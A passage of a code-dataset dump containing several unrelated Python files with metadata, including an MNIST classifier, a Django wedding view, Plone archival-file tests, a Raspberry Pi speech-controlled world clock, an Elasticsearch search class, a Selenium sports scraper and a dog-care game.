== \"__main__\":\n (X_train, y_train), (X_test, y_test) = get_mnist_data()\n # plt_mnist()\n sgd_clf = SGDClassifier(random_state=42)\n sgd_clf.fit(X_train, y_train)\n print(sgd_clf.predict(X_test[:10]))\n print(y_test[:10])","sub_path":"Machine learning practice/classification-practice/mnistTest.py","file_name":"mnistTest.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"117930308","text":"##\n## Por cada clave de la columna 5 (cadena de tres letras), obtenga\n## el valor mas pequeño y el valor mas grande asociado a esa clave.\n##\n## aaa,0,6\n## bbb,4,7\n## ccc,0,1\n## ddd,5,5\n## eee,0,0\n## fff,4,9\n## ggg,3,3\n## hhh,6,8\n## iii,2,7\n## jjj,2,5\n##\n\n\n'''\n\naaa,0,9\nbbb,0,9\nccc,0,9\nddd,0,9\neee,0,7\nfff,0,9\nggg,0,9\nhhh,0,9\niii,0,9\njjj,0,9\n\n'''\n\n\nfrom libM import generateMatrix\n\nt = []\n\nfor row in generateMatrix():\n t.extend(row[4].split(','))\n\nd = {}\nh = []\nfor element in t:\n l, n = element.split(':')\n if l in d:\n d[l] += str(' '+n)\n else:\n d[l] = str(n)\n h.append(l)\n\nfor i in sorted(h):\n print(i, min(d[i].split(' ')), max(d[i].split(' ')), sep=',')\n","sub_path":"q06.py","file_name":"q06.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"566524578","text":"from django.conf import settings\nfrom django.shortcuts import render\nfrom guests.save_the_date import SAVE_THE_DATE_CONTEXT_MAP\nfrom .models import Photo, SiteSection\nfrom .serializers import PhotoSerializer, SiteSectionSerializer\nfrom datetime import date\n\n\ndef home(request):\n photos = Photo.objects.all()\n sections = SiteSection.objects.all().order_by('order')\n\n photo_data = PhotoSerializer(photos, many=True).data\n section_data = SiteSectionSerializer(sections, many=True).data\n\n wedding_day = date(2019, 9, 15)\n today = date.today()\n\n days_until_wedding = (wedding_day - today).days\n\n section_test = {\n section['order']: section['content']\n for section in section_data\n }\n\n return render(request, 'home.html', context={\n 'save_the_dates': SAVE_THE_DATE_CONTEXT_MAP,\n 'support_email': settings.DEFAULT_WEDDING_REPLY_EMAIL,\n 'photos': {photo['name']: photo for photo in photo_data},\n 'days_until_wedding': days_until_wedding,\n 'sections': section_test,\n })\n","sub_path":"wedding/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"431814335","text":"from datetime import datetime\nfrom ftw.builder import Builder\nfrom ftw.builder import create\nfrom ftw.bumblebee.tests.helpers import download_token_for\nfrom ftw.testing import freeze\nfrom opengever.bumblebee.browser.callback import StoreArchivalFile\nfrom opengever.document.archival_file import STATE_FAILED_TEMPORARILY\nfrom opengever.document.archival_file import STATE_FAILED_PERMANENTLY\nfrom opengever.document.behaviors.metadata import IDocumentMetadata\nfrom opengever.testing import FunctionalTestCase\nfrom plone.namedfile.file import NamedBlobFile\nimport json\n\n\nclass TestStoreArchivalFile(FunctionalTestCase):\n\n def setUp(self):\n super(TestStoreArchivalFile, self).setUp()\n self.document = create(Builder('document')\n .titled(u'\\xdcberpr\\xfcfung XY')\n .with_dummy_content())\n\n def test_updates_archival_file_when_conversion_succeeded(self):\n with freeze(datetime(2016, 4, 25, 10, 24)):\n body = {'status': \"success\",\n 'data': \"data:application/pdf;base64,VGVzdCBTdHJpbmc=\",\n 'token': download_token_for(self.document)}\n self.request.set('BODY', json.dumps(body))\n\n view = StoreArchivalFile(self.document, self.request)\n view()\n\n archival_file = IDocumentMetadata(self.document).archival_file\n self.assertEquals('uberprufung-xy.pdf', archival_file.filename)\n self.assertTrue(isinstance(archival_file, NamedBlobFile))\n self.assertEquals('application/pdf', archival_file.contentType)\n self.assertEquals('Test String', archival_file.data)\n\n def test_sets_failed_permanently_state_when_conversion_was_skipped(self):\n with freeze(datetime(2016, 4, 25, 10, 24)):\n body = {\"status\": \"skipped\",\n \"error\": \"File is password protected.\",\n \"token\": download_token_for(self.document)}\n self.request.set('BODY', json.dumps(body))\n\n view = StoreArchivalFile(self.document, self.request)\n view()\n\n self.assertEquals(\n STATE_FAILED_PERMANENTLY,\n IDocumentMetadata(self.document).archival_file_state)\n\n def test_sets_failed_temporary_state_when_conversion_has_not_succeeded_or_skipped(self):\n with freeze(datetime(2016, 4, 25, 10, 24)):\n body = {\"status\": \"failed\",\n \"error\": \"Some parts of the document could not be processed\",\n \"token\": download_token_for(self.document)}\n self.request.set('BODY', json.dumps(body))\n\n view = StoreArchivalFile(self.document, self.request)\n view()\n\n self.assertEquals(\n STATE_FAILED_TEMPORARILY,\n IDocumentMetadata(self.document).archival_file_state)\n","sub_path":"opengever/bumblebee/tests/test_callback.py","file_name":"test_callback.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"5292619","text":"import time\nimport subprocess\nimport digitalio\nimport board\nfrom PIL import Image, ImageDraw, ImageFont\nimport adafruit_rgb_display.st7789 as st7789\nfrom time import strftime, sleep\nfrom datetime import datetime\nimport pytz \nfrom random import randint\nimport board\nimport busio\nfrom adafruit_bus_device.i2c_device import I2CDevice\nfrom i2c_button import I2C_Button\n\nfrom vosk import Model, KaldiRecognizer\nimport sys\nimport os\nimport wave\nimport json\nimport subprocess\ntime_zone_name = {\n \"-12\":\"New Zealand\\nStandard Time\",\n \"-11\":\"Solomon\\nStandard Time\",\n \"-10\":\"Australia\\nEastern Time\",\n \"-9\":\"Japan\\nStandard Time\",\n \"-8\":\"China\\nStandard Time\",\n \"-7\":\"Vietnam\\nStandard Time\",\n \"-6\":\"Bangladesh\\nStandard Time\",\n \"-5\":\"Pakistan\\nLahore Time\",\n \"-4\":\"Near East\\nTime\",\n \"-3\":\"Eastern African\\nTime\",\n \"-2\":\"Egypt\\nStandard Time\",\n \"-1\":\"European\\nCentral Time\",\n \"0\":\"Greenwich\\nMean Time\",\n \"1\":\"Central\\nAfrican Time\",\n \"2\":\"Fernando de\\nNoronha Time\",\n \"3\":\"Argentina\\nStandard Time\",\n \"4\":\"Puerto Rico\\nTime\",\n \"5\":\"Eastern\\nStandard Time\",\n \"6\":\"Central\\nStandard Time\",\n \"7\":\"Mountain\\nStandard Time\",\n \"8\":\"Pacific\\nStandard Time\",\n \"9\":\"Alaska\\nStandard Time\",\n \"10\":\"Hawaii\\nStandard Time\",\n \"11\":\"Midway\\nIslands Time\",\n }\n\ntime_zone_gmt = {\n \"-12\":\"Etc/GMT-12\",\n \"-11\":\"Etc/GMT-11\",\n \"-10\":\"Etc/GMT-10\",\n \"-9\":\"Etc/GMT-9\",\n \"-8\":\"Etc/GMT-8\",\n \"-7\":\"Etc/GMT-7\",\n \"-6\":\"Etc/GMT-6\",\n \"-5\":\"Etc/GMT-5\",\n \"-4\":\"Etc/GMT-4\",\n \"-3\":\"Etc/GMT-3\",\n \"-2\":\"Etc/GMT-2\",\n \"-1\":\"Etc/GMT-1\",\n \"0\":\"Etc/GMT0\",\n \"1\":\"Etc/GMT+1\", \n \"2\":\"Etc/GMT+2\",\n \"3\":\"Etc/GMT+3\",\n \"4\":\"Etc/GMT+4\",\n \"5\":\"Etc/GMT+5\",\n \"6\":\"Etc/GMT+6\",\n \"7\":\"Etc/GMT+7\",\n \"8\":\"Etc/GMT+8\",\n \"9\":\"Etc/GMT+9\",\n \"10\":\"Etc/GMT+10\",\n \"11\":\"Etc/GMT+11\",\n}\n\n\ncurrent_tz = 5\n# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):\ncs_pin = digitalio.DigitalInOut(board.CE0)\ndc_pin = digitalio.DigitalInOut(board.D25)\nreset_pin = None\n\n# Config for display baudrate (default max is 24mhz):\nBAUDRATE = 64000000\n\n# Setup SPI bus using hardware SPI:\nspi = board.SPI()\n\n# Create the ST7789 display:\ndisp = st7789.ST7789(\n spi,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE,\n width=135,\n height=240,\n x_offset=53,\n y_offset=40,\n)\n\ndef Speech2Text():\n wf = wave.open(\"recording.wav\", \"rb\")\n if wf.getnchannels() != 1 or wf.getsampwidth() != 2 or wf.getcomptype() != \"NONE\":\n print (\"Audio file must be WAV format mono PCM.\")\n exit (1)\n\n model = Model(\"model\")\n # You can also specify the possible word list\n rec = KaldiRecognizer(model, wf.getframerate(), \"east west day night shanghai paris tokyo\")\n\n while True:\n data = wf.readframes(4000)\n if len(data) == 0:\n break\n if rec.AcceptWaveform(data):\n print(rec.Result())\n else:\n print(rec.PartialResult())\n res = json.loads(rec.FinalResult())\n print (\"Speech2Text: \"+ res['text'])\n return res['text']\n\ndef ScaleImage(image):\n# Scale the image to the smaller screen dimension\n\twidth = 135\n\theight = 240\n\n\timage_ratio = image.width / image.height\n\tscreen_ratio = width / height\n\tif screen_ratio < image_ratio:\n\t scaled_width = image.width * height // image.height\n\t scaled_height = height\n\telse:\n\t scaled_width = width\n\t scaled_height = image.height * width // image.width\n\timage = image.resize((scaled_width, scaled_height), Image.BICUBIC)\n\n\t# Crop and center the image\n\tx = scaled_width // 2 - width // 2\n\ty = scaled_height // 2 - height // 2\n\timage = image.crop((x, y, x + width, y + height))\n\n\timage = image.convert('RGB')\n\timage = image.resize((240, 135),Image.BICUBIC)\n\treturn image\n\n\nif not os.path.exists(\"model\"):\n print (\"Please download the model from https://github.com/alphacep/vosk-api/blob/master/doc/models.md and unpack as 'model' in the current folder.\")\n exit (1)\n\n# Try to create an I2C device\ni2c = busio.I2C(board.SCL, board.SDA)\nprint(\"I2C ok!\")\n# ids = '\\n'.join(map(str,i2c.scan()))\n# print(f\"I2C device ID's found:\\n{ids}\")\n \nwhile not i2c.try_lock():\n pass\n \nprint(\"I2C addresses found:\", [hex(device_address) for device_address in i2c.scan()])\ni2c.unlock()\n\n# initialize the button\nbutton = I2C_Button(i2c)\nbutton.led_bright = 0\nbutton.led_gran = 1\nbutton.led_cycle_ms = 0\nbutton.led_off_ms = 0\n# Create blank image for drawing.\n# Make sure to create image with mode 'RGB' for full color.\nheight = disp.width # we swap height/width to rotate it to landscape!\nwidth = disp.height\nimage = Image.new(\"RGB\", (width, height))\nrotation = 90\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Draw a black filled box to clear the image.\ndraw.rectangle((0, 0, width, height), outline=0, fill=(0, 0, 0))\ndisp.image(image, rotation)\n# Draw some shapes.\n# First define some constants to allow easy resizing of shapes.\npadding = -2\ntop = padding\nbottom = height - padding\n# Move left to right keeping track of the current x position for drawing shapes.\nx = 0\n\n# Alternatively load a TTF font. Make sure the .ttf font file is in the\n# same directory as the python script!\n# Some other nice fonts to try: http://www.dafont.com/bitmap.php\nfont = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 18)\n\n# Turn on the backlight\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\n\nbuttonA = digitalio.DigitalInOut(board.D23)\nbuttonB = digitalio.DigitalInOut(board.D24)\nbuttonA.switch_to_input()\nbuttonB.switch_to_input()\nprevA = True\nprevB = True\nDAYNIGHT = \"day\"\nDAYNIGHTFORCE = False\nprevButton = False\nspeechInput = False\nprev_tz = current_tz\nwhile True:\n button.clear()\n time.sleep(1)\n\n if button.status.is_pressed:\n button.led_bright = 100\n if not prevButton:\n process = subprocess.Popen([\"arecord\", \"-D\", \"hw:2,0\", \"-d\", \"5\", \"-f\", \"cd\", \"recording.wav\", \"-c\", \"1\"])\n prevButton = True\n else:\n button.led_bright = 0\n if prevButton:\n process.kill()\n prevButton = False\n speechInput = True\n\n if speechInput:\n speechInput = False\n text = Speech2Text()\n if text == \"east\":\n if current_tz == -12:\n current_tz = 11\n else:\n current_tz-=1\n elif text == \"west\":\n if current_tz == 11:\n current_tz = -12\n else:\n current_tz+=1 \n elif text == \"day\":\n DAYNIGHTFORCE = True\n DAYNIGHT = \"day\"\n elif text == \"night\":\n DAYNIGHTFORCE = True\n DAYNIGHT = \"night\"\n elif text == \"shanghai\":\n current_tz = -8\n elif text == \"paris\":\n current_tz = -1 \n elif text == \"tokyo\":\n current_tz = -9 \n\n if not buttonA.value and not buttonB.value:\n current_tz = 5\n elif not buttonA.value and prevA:\n if current_tz == -12:\n current_tz = 11\n else:\n current_tz-=1\n prevA = buttonA.value\n elif not buttonB.value and prevB:\n if current_tz == 11:\n current_tz = -12\n else:\n current_tz+=1\n prevB = buttonB.value\n\n if prev_tz != current_tz:\n DAYNIGHTFORCE = False\n prev_tz = current_tz\n prevA = buttonA.value\n prevB = buttonB.value\n\n # Draw a black filled box to clear the image.\n NAME = time_zone_name[str(current_tz)] + \"\\n\"\n TIME = datetime.now(pytz.timezone(time_zone_gmt[str(current_tz)])).strftime(\"%m/%d/%Y \\n %H:%M:%S\") \n HOUR = datetime.now(pytz.timezone(time_zone_gmt[str(current_tz)])).strftime(\"%H\")\n HOUR = int(HOUR)\n\n if not DAYNIGHTFORCE:\n DAYNIGHT = \"day\"\n if HOUR >= 19 or HOUR <7:\n \tDAYNIGHT = \"night\"\n\n draw.rectangle((0, 0, width, height), outline=0, fill=0)\n img_name = str(current_tz)+ DAYNIGHT+\".jpg\"\n background = Image.open(img_name)\n background = ScaleImage(background)\n draw = ImageDraw.Draw(background)\n\n if not buttonA.value:\n draw.rectangle((0,0,width,height),outline=0,fill = \"#00FF00\")\n elif not buttonB.value:\n draw.rectangle((0,0,width,height),outline=0,fill = \"#FF0000\")\n \n #TODO: fill in here. You should be able to look in cli_clock.py and stats.py \n\n y=top\n EAST = \"---------\\n EAST |\\n---------\"\n WEST = \"---------\\n WEST |\\n---------\"\n draw.text((0,5),EAST, font=font, fill = \"#00FF00\")\n draw.text((0,75),WEST,font=font, fill = \"#FF0000\")\n draw.text((x+100, y+20), NAME, font=font, fill=\"#FFFFFF\")\n draw.text((x+100, y+85), TIME, font=font, fill=\"#FFFFFF\")\n\n # Display image.\n disp.image(background,rotation)\n #disp.image(image, rotation)\n #time.sleep(1)","sub_path":"Lab 3/speech_world_clock/world_clock_speech.py","file_name":"world_clock_speech.py","file_ext":"py","file_size_in_byte":9273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"199395593","text":"from elasticsearch import Elasticsearch\nimport json\nimport requests\n\nes = Elasticsearch([{'host': 'search-cchw-tuqtxpaytxyzew35b5xhuixuku.us-east-1.es.amazonaws.com', 'port': 80}])\n\n#let's iterate over swapi people documents and index them\n\nclass ESSearch():\n es = Elasticsearch([{'host': 'localhost', 'port': 9200}])\n def search(self, keyword):\n es_data = es.search(index=\"twitter\", size=2000, body={\"query\": {\"match\": {'text':{'query': keyword}}}})\n es_results = es_data['hits']['hits']\n tweets = []\n for es_result in es_results:\n tweets.append(es_result[\"_source\"])\n tweets_of_keyword = {keyword: tweets}\n return tweets_of_keyword\n\n def geosearch(self, location, distance):\n es_data = es.search(index=\"twitter\", size=2000,\n body={\n \"query\": {\n \"bool\": {\n \"must\": {\n \"match_all\": {}\n },\n \"filter\": {\n \"geo_distance\": {\n \"distance\": '%skm' % (distance),\n \"location\": location\n }\n }\n }\n }})\n es_res = es_data['hits']['hits']\n tweets = []\n for res in es_res:\n tweets.append(res[\"_source\"])\n return tweets\n ","sub_path":"essearch.py","file_name":"essearch.py","file_ext":"py","file_size_in_byte":1382,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"144176002","text":"'''\nSequenceManipulation Counting Sort\n484 - The Department of Redundancy Department\n\nWrite a program that will remove all duplicates from a sequence of integers and print the list of unique integers occuring in the input sequence, along with the number of occurences of each.\n'''\nif __name__ == '__main__':\n memo = {}\n printing = []\n while True:\n try:\n value = list(map(int, input().split()))\n for n in value:\n if n not in printing:\n printing.append(n)\n if n not in memo:\n memo[n] = 1\n else:\n memo[n] += 1\n except(EOFError):\n break\n printed = set()\n for i in printing:\n if i in printed:\n pass\n else:\n printed.add(i)\n print(i, memo[i])\n","sub_path":"484.py","file_name":"484.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"322164823","text":"# _*_ coding:utf-8 _*_\r\nimport time\r\nfrom selenium import webdriver\r\n\r\n# 获取直播吧,第二天篮球比赛信息\r\ndef get_next_day_basketball_game_list(url):\r\n driver = webdriver.Chrome()\r\n driver.maximize_window()\r\n driver.get(url)\r\n driver.implicitly_wait(10)\r\n\r\n time.sleep(1) # 等待页面加载\r\n # 定位第二天所在的box\r\n next_box_ele = driver.find_elements_by_class_name(\"box\")[1] # 选择第二天所在的box\r\n # 获取比赛日期\r\n playing_time_text = next_box_ele.find_element_by_tag_name(\"h2\").text\r\n print(\"比赛日期:%s\" % playing_time_text)\r\n print(\"当天的比赛信息如下:\")\r\n\r\n #获取比赛信息\r\n game_lis = next_box_ele.find_elements_by_tag_name(\"li\")\r\n for li in game_lis:\r\n if \"NBA\" in li.get_attribute(\"label\") or \"篮球\" in li.get_attribute(\"label\"):\r\n if \"QQ\" in li.text:\r\n game_time,game_msg,team_msg = li.text.split(\"QQ\")[0].split(\" \",maxsplit=2)\r\n if team_msg == \"\":\r\n continue\r\n elif \"CCTV\" in li.text:\r\n game_time,game_msg,team_msg = li.text.split(\"CCTV\")[0].split(\" \",maxsplit=2)\r\n if team_msg == \"\":\r\n continue\r\n print(\"game_time : %s, game_msg : %s, team_msg: %s\"%(game_time,game_msg,team_msg))\r\n #修改\r\n input(\"press enter to quit...\")\r\n driver.quit()\r\n\r\ndef main():\r\n url = \"https://www.zhibo8.cc/\"\r\n get_next_day_basketball_game_list(url)\r\n print(\"\")\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n main()","sub_path":"myPythonwork/selenium_exer/从直播吧获取第二天篮球比赛对决详细.py","file_name":"从直播吧获取第二天篮球比赛对决详细.py","file_ext":"py","file_size_in_byte":1564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"223430470","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport datetime\nimport logging\nimport re\nimport config \nimport classes\nfrom lib import listas\nfrom classes import *\nfrom detalhe_competicao import DetalheCompeticao\nfrom google.appengine.api import memcache\n\nclass DetalheCompeticaoIndices(DetalheCompeticao):\n\t\t\n\t# memcache vars\n\tcache_namespace = \"detalhe_competicao_indices\"\n\trender_this_page_without_main = True\n\n\t# objecto do respectivo acumulador\n\tnspace1 = \"icc\"\n\tnspace2 = \"tabela_icc\"\n\tnspace3 = \"ica\"\n\tacumulador_icc = None\n\tacumulador_tabela_icc = None\n\t\n\tdef get(self):\n\t\tself.decontaminate_vars()\n\t\tself.checkCacheFreshen()\n\t\treturn self.requestHandler()\n\t\t\n\t# este verifica acumulador, não o cmp_ultima_alteracao\n\tdef checkCacheFreshen(self):\n\t\t\n\t\tdata_cache = None # data do HTML gerado em cache\n\t\t\n\t\tself.softcache_html = memcache.get(self.cache_url, namespace=self.cache_namespace)\n\t\tif self.softcache_html:\n\t\t\tdata_cache = self.softcache_html['date']\n\t\telse:\n\t\t\tself.hardcache_html = CacheHTML.all().filter(\"cch_url = \",self.cache_url).get()\n\t\t\tif self.hardcache_html != None:\n\t\t\t\tdata_cache = self.hardcache_html.cch_date\n\t\n\t\tself.acumulador_icc = memcache.get(\"acumulador-%s-%s\" % (self.competicao, config.VERSAO_ACUMULADOR),\n\t\t namespace=self.nspace1)\n\t\t\n\t\tif not self.acumulador_icc:\n\t\t\tself.acumulador_icc = classes.getAcumuladorCompeticao(self.competicao, config.VERSAO_ACUMULADOR, self.nspace1)\n\n\t\tif data_cache and self.acumulador_icc and self.acumulador_icc.acuc_date > data_cache:\n\t\t\tself.refreshen_cache = True\n\t\t\t\n\t\tself.acumulador_ica = memcache.get(\"acumulador-%s-%s\" % (self.competicao, config.VERSAO_ACUMULADOR),\n\t\t namespace=self.nspace3)\n\n\t\tif not self.acumulador_ica:\n\t\t\tself.acumulador_ica = classes.getAcumuladorCompeticao(self.competicao, config.VERSAO_ACUMULADOR, self.nspace3)\n\n\t\tif data_cache and self.acumulador_ica and self.acumulador_ica.acuc_date > data_cache:\n\t\t\tself.refreshen_cache = True\n\t\t\n\t\tself.acumulador_tabela_icc = memcache.get(\"acumulador-%s-%s\" % (self.competicao, config.VERSAO_ACUMULADOR),\n\t\t namespace=self.nspace2)\n\t\t\n\t\tif not self.acumulador_tabela_icc:\n\t\t\tself.acumulador_tabela_icc = classes.getAcumuladorCompeticao(self.competicao, config.VERSAO_ACUMULADOR, self.nspace2)\n\n\t\tif data_cache and self.acumulador_tabela_icc and self.acumulador_tabela_icc.acuc_date > data_cache:\n\t\t\tself.refreshen_cache = True\n\n\tdef renderDados(self):\n\t\t# já tenho os mesu dois acumuladores, quero é populá-los com clubes e árbitros\n\t\tlista_clubes = listas.get_lista_clubes()\n\t\thash_clubes = {}\n\t\tlista_arbitros = listas.get_lista_arbitros()\n\t\thash_arbitros = {}\n\n\t\tfor clube in lista_clubes:\n\t\t\thash_clubes[clube.key().id()] = clube\n\t\tfor arbitro in lista_arbitros:\n\t\t\thash_arbitros[arbitro.key().id()] = arbitro\n\t\n\t\t# preparar a tabela de icc\t\t\n\t\t\n\t\ttabela_icc = self.acumulador_tabela_icc.acuc_content[\"tabela_icc\"]\n\t\tfor idx, val in enumerate(tabela_icc):\n\t\t\tif tabela_icc[idx].has_key(\"arb\"):\n\t\t\t\tif hash_arbitros.has_key(tabela_icc[idx][\"arb\"]):\n\t\t\t\t\ttabela_icc[idx][\"arbitro\"] = hash_arbitros[tabela_icc[idx][\"arb\"]]\n\t\t\tif tabela_icc[idx].has_key(\"clus\"):\n\t\t\t\tfor idx2, va2 in enumerate(tabela_icc[idx][\"clus\"]):\n\t\t\t\t\tif (hash_clubes.has_key(tabela_icc[idx][\"clus\"][idx2][\"clu\"])):\n\t\t\t\t\t\ttabela_icc[idx][\"clus\"][idx2][\"clube\"] = hash_clubes[tabela_icc[idx][\"clus\"][idx2][\"clu\"]]\n\n\t\t# obter a lista de clubes pela qual está ordenada a tabela_icc\n\t\t\n\t\tclubes = []\n\t\tif len(tabela_icc) > 0:\n\t\t\tfor idx, val in enumerate(tabela_icc[0][\"clus\"]):\n\t\t\t\tclubes.append(val[\"clube\"])\n\n\t\t# preparar o gráfico de icc\n\t\tgrafico_icc = self.acumulador_icc.acuc_content[\"icc\"]\n\t\tfor idx, val in enumerate(grafico_icc):\n\t\t\tgrafico_icc[idx][\"clube\"] = hash_clubes[grafico_icc[idx][\"clu\"]]\n\n\t\t# preparar o gráfico de ica\n\t\tgrafico_ica = self.acumulador_ica.acuc_content[\"ica\"]\n\t\tfor idx, val in enumerate(grafico_ica):\n\t\t\tgrafico_ica[idx][\"arbitro\"] = hash_arbitros[grafico_ica[idx][\"arb\"]]\n\n\t\tif len(grafico_ica) > 16: \n\t\t\tlist_1 = grafico_ica[:8]\n\t\t\tlist_2 = grafico_ica[-8:]\n\t\t\tfor el in list_2:\n\t\t\t\tlist_1.append(el)\n\t\t\tgrafico_ica = list_1\n\n\t\tdados = {\n\t\t\"clubes_tabela_icc\":clubes,\n\t\t\"tabela_icc\":tabela_icc,\n\t\t\"grafico_icc\":grafico_icc,\n\t\t\"grafico_ica\":grafico_ica\n\t\t}\n\t\treturn dados\n\n\tdef renderHTML(self):\n\t\t#logging.info(\"renderHTML\")\n\t\thtml = self.render_subdir('competicao','detalhe_competicao_indices.html', {\n\t\t\t\"clubes_tabela_icc\":self.dados[\"clubes_tabela_icc\"],\n\t\t\t\"tabela_icc\":self.dados[\"tabela_icc\"],\n\t\t\t\"competicao\":self.competicao,\n\t\t\t\"grafico_icc\":self.render_subdir('gera','gera_grafico_horizontal_icc.html', {\n\t\t\t\t\t\"icc_dados\": self.dados[\"grafico_icc\"],\n\t\t\t\t\t\"competicao\":self.competicao\n\t\t\t\t\t\n\t\t\t}),\n\t\t\t\"grafico_ica\":self.render_subdir('gera','gera_grafico_horizontal_ica.html', {\n\t\t\t\t\t\"ica_dados\": self.dados[\"grafico_ica\"],\n\t\t\t\t\t\"competicao\":self.competicao\n\t\t\t\t\t\n\t\t\t}),\n\t\t\t\"data\":datetime.datetime.now()\n\t\t})\n\t\treturn html\n","sub_path":"handlers/competicao/detalhe_competicao_indices.py","file_name":"detalhe_competicao_indices.py","file_ext":"py","file_size_in_byte":4880,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"533574030","text":"#!/usr/bin/env python3\nimport time\nimport random\n\n\nclass Dog:\n\n def __init__(self, name, breed=None):\n self.name = name\n\n if breed:\n self.breed = breed\n else:\n self.breed = 'unknown breed'\n\n self.hunger_level = 0\n\n self.is_dead = False\n self._status = None\n\n # this is 'protected' variable. Protected in the sense of it should be private, but not in the sense that you\n # can't actually reference it from outside the object.\n self._creation_time = time.time()\n self._cause_of_death = None\n\n def feed(self):\n self.update_age()\n if not self.is_dead:\n self.hunger_level -= 1\n if self.hunger_level < -5:\n self.is_dead = True\n self._cause_of_death = 'overeating'\n elif self.hunger_level < -3:\n print('Watch out, {} is getting fat. You should go for a walk'.format(self.name))\n self._status = 'fat'\n else:\n self._status = 'well'\n if not self.is_dead:\n print('{} is at hunger level: {}'.format(self.name, self.hunger_level))\n print()\n self.dead_msg()\n\n def walk(self):\n self.update_age()\n if not self.is_dead:\n dist_walked = int(random.random() * 9) + 1\n print('{} went on a walk for {} km.'.format(self.name, dist_walked))\n self.hunger_level += int(dist_walked / 3)\n\n if self.hunger_level > 8:\n self.is_dead = True\n self._cause_of_death = 'exhaustion'\n elif self.hunger_level > 4:\n print(self.name, 'is pretty tired. You should feed it.')\n self._status = 'fatigued'\n else:\n self._status = 'wells'\n\n print()\n self.dead_msg()\n\n def update_age(self):\n current_time = time.time()\n if current_time - self._creation_time > 150: # kill dog after 2.5 minutes\n self.is_dead = True\n self._cause_of_death = 'old age'\n\n def dead_msg(self):\n if self.is_dead:\n print('Unfortunately %s has died of %s.' % (self.name, self._cause_of_death))\n\n def get_status(self):\n if not self._status:\n self._status = 'well'\n return self._status\n\n\nclass DogManager:\n def __init__(self):\n self._num_default_dog = 1\n self.dog_list = []\n self.dog_dict = {}\n\n # technically camelCase isn't PEP-8 but it makes too much sense to not use.\n def adoptDog(self):\n print()\n print('So you want to adopt a dog')\n\n name = None\n counter = 0\n while not name and counter < 10:\n name = input('What\\'s its name?: ').strip()\n if not name:\n # blank name. '', None, and [] evaluate to False logically\n print('Sorry a name is required.')\n elif name.lower() in self.dog_dict: # lower() returns the string but all lowercased\n print('Sorry dog must have unique names.')\n print('Names already in use:')\n for name in self.dog_dict:\n print(' ' + name)\n print()\n counter += 1\n\n if counter >= 10:\n print('Too many failed attempts, a default dog will be adopted!')\n name = 'Poochie ' + str(self._num_default_dog)\n self._num_default_dog += 1\n breed = None\n else:\n breed = input('What\\'s %s\\'s breed?: ' % name) # if nothing entered this will be handled in init of Dog()\n print()\n\n dog = Dog(name, breed)\n self.dog_list.append(dog)\n self.dog_dict[name.lower()] = dog\n\n if name[0].lower() in ['a', 'e', 'i', 'o', 'u']:\n indefinite_article = 'an'\n else:\n indefinite_article = 'a'\n\n print('Done. You\\'ve adopted ' + indefinite_article + ' {} named {}!'.format(dog.breed, dog.name))\n print()\n time.sleep(1)\n\n def feedDog(self):\n\n if self.dog_list: # if no dogs in list\n self.print_dog_house()\n print('Pick a Dog you want to Feed or \\'q\\' to go back.')\n\n while True:\n dog = None\n dog_to_feed = input('Which dog do you want to feed?: ').lower().strip()\n print()\n if dog_to_feed == 'q':\n return # exit method\n try:\n # user picked a number\n dog = self.dog_list[int(dog_to_feed)]\n except ValueError:\n try:\n dog = self.dog_dict[dog_to_feed.lower()]\n except KeyError:\n print('Could not find: ' + dog_to_feed)\n time.sleep(1)\n except KeyError:\n print('Dog {} is an invalid choice'.format(dog_to_feed))\n time.sleep(1)\n if dog:\n dog.feed()\n if not dog.is_dead:\n print('Dog Successfully Fed!')\n print()\n time.sleep(1)\n break\n\n else:\n print('You own no dogs at the moment. Please adopt one first!')\n print()\n time.sleep(1)\n\n def walkDog(self):\n if self.dog_list:\n self.print_dog_house()\n print('Pick a Dog you want to Walk or \\'q\\' to go back.')\n while True:\n dog = None\n dog_to_walk = input('Which dog do you want to walk?: ').lower().strip()\n print()\n if dog_to_walk == 'q':\n return # exit method\n\n try:\n # user picked a number\n dog = self.dog_list[int(dog_to_walk)]\n except ValueError:\n try:\n dog = self.dog_dict[dog_to_walk.lower()]\n except KeyError:\n print('Could not find: ' + dog_to_walk)\n except IndexError:\n print('Dog {} is an invalid choice'.format(dog_to_walk))\n if dog:\n dog.walk()\n if not dog.is_dead:\n print('Dog Successfully Walked!')\n print()\n time.sleep(1)\n break\n else:\n print('You don\\'t own any dogs at the moment. Please adopt one first!')\n print()\n time.sleep(1)\n\n def print_dog_house(self):\n if self.dog_list:\n print('You have', len(self.dog_list), 'dog(s) right now:')\n for ind, dog in enumerate(self.dog_list):\n if dog.is_dead:\n status = 'Dead'\n else:\n # Alive\n dog_status = dog.get_status()\n if dog_status.lower().strip() != 'well':\n status = 'Alive but ' + dog_status\n else:\n status = 'Alive and ' + dog_status\n\n status += ' - hunger_level = {}'.format(dog.hunger_level)\n print(' ' + str(ind) + ': ' + dog.name + ' - ' + status)\n print()\n else:\n print('You don\\'t own any dogs at the moment. Please adopt one first!')\n 